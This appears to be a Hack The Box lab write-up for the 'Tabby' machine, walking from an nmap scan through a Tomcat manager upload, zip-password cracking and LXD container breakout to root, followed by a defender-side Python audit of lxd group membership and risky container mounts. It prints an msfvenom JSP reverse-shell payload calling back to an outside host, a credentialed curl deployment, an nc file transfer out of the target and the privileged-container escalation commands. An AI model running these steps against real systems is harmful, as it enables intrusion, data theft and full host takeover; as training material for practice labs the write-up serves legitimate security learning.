[HTB] Tabby — Writeup

  • Tomcat JSP Script Exploit
  • Password Protected .zip File Abuse
  • Linux LXD Container Breakout

Initial Recon

Nmap

Let’s begin with an initial port scan:

$ nmap -Pn --open -p- -sC -sV 10.10.10.194
PORT     STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Interesting Ports to Note

  • HTTP (80/TCP) — Mega Hosting Web page.

Initial Foothold

LFI (Mega Hosting Website)

By looking at the source code for the web page, we can discover the domain name megahosting.htb. Let’s add that into our /etc/hosts file.

User: tomcat
Pass: $3cureP4s5w0rd123!
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.3 LPORT=443 -f war > bigb0ss.war
$ curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file bigb0ss.war 'http://10.10.10.194:8080/manager/text/deploy?path=/bigb0ss'
OK - Deployed application at context path [/bigb0ss]

Privilege Escalation

tomcat → ash

Further enumeration found that there is a directory called /var/www/html/files which is owned by the user ash.

# Kali Box
$ nc -lvnp 80 > backup.zip
# Tabby Box
$ nc 10.10.14.3 80 < 16162020_backup.zip
# zip2john
$ zip2john backup.zip > bakcup-prep.zip
# John
$ john --wordlist=/usr/share/wordlists/rockyou.txt bakcup-prep.zip

user.txt

The recovered password did unzip the file, but the archive held nothing useful. It turned out that the same password was also the password of the ash user, so we can now log in as ash and read the user.txt flag.


ash → root (LXD Privilege Escalation)

From the above image, we can see that ash is a member of the lxd group. LXD (Linux Daemon) is a lightweight container hypervisor, and there is a well-known privilege escalation path for a local user in the lxd group to gain root on the host: the user can launch a privileged container with the host's filesystem mounted inside it. More details about the attack can be found [here](https://www.hackingarticles.in/lxd-privilege-escalation/).

$ git clone https://github.com/saghul/lxd-alpine-builder.git
$ cd lxd-alpine-builder
$ sudo bash build-alpine
# Initialise LXD (accept the defaults for every prompt)
$ lxd init
# Import Image
$ lxc image import ./alpine-v3.12-x86_64-20201030_0034.tar.gz --alias bigb0ss
$ lxc image list
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| bigb0ss | c57d8b79d13e | no | alpine v3.12 (20201030_00:34) | x86_64 | CONTAINER | 3.07MB | Oct 30, 2020 at 4:58am (UTC) |
+---------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
$ lxc init bigb0ss priv -c security.privileged=true
$ lxc config device add priv mydevice disk source=/ path=/mnt/root recursive=true
$ lxc start priv
$ lxc exec priv /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # cat /mnt/root/root/root.txt
b0d...REDACTED...d7c
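As an added defender-side check (my own code, not part of the original writeup), the following Python audits the two conditions this escalation relies on: membership in the lxd group and a container that maps the host's / as a disk device. It runs over constructed sample input that mirrors the container built above; the sample strings and the function names `lxd_group_members`, `parse_lxc_config` and `audit_lxd` are assumptions of this example.

```python
import re

# Constructed samples (not from the target box): an /etc/group excerpt and `lxc config show` output.
SAMPLE_GROUP = "sudo:x:27:\nlxd:x:116:ash\n"
SAMPLE_LXC_CONFIG = """\
name: priv
config:
  security.privileged: "true"
devices:
  mydevice:
    path: /mnt/root
    source: /
    type: disk
  root:
    path: /
    type: disk
"""

def lxd_group_members(group_text):
    """Users on the lxd line of /etc/group; each can reach root the way shown above."""
    match = re.search(r"^lxd:[^:]*:[^:]*:(.*)$", group_text, re.M)
    return [u for u in match.group(1).split(",") if u] if match else []

def parse_lxc_config(text):
    """Minimal parser for `lxc config show` output (2-space indents, scalars only)."""
    tree, path = {}, []
    for line in filter(str.strip, text.splitlines()):
        depth = (len(line) - len(line.lstrip())) // 2
        key, _, value = line.strip().partition(":")
        value = value.strip().strip('"')
        path = path[:depth] + [key]
        node = tree
        for k in path[:-1]:
            node = node.setdefault(k, {})
        node[key] = {} if value in ("", "{}") else value
    return tree

def audit_lxd(group_text, config_text):
    """Findings to act on: lxd group members, and a container that maps host / inside."""
    findings = []
    if members := lxd_group_members(group_text):
        findings.append("lxd group members (root-equivalent on the host): " + ", ".join(members))
    cfg = parse_lxc_config(config_text)
    privileged = cfg.get("config", {}).get("security.privileged") == "true"
    for name, dev in cfg.get("devices", {}).items():
        if dev.get("type") == "disk" and dev.get("source") == "/":
            label = "privileged" if privileged else "unprivileged"
            findings.append(f"{cfg.get('name')}: {label} container exposes host / "
                            f"via device '{name}' at {dev.get('path')}")
    return findings
```

On a real host, feed it `/etc/group` and `lxc config show <name>` for each container; an empty lxd group and no disk device with `source: /` is the state to aim for.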
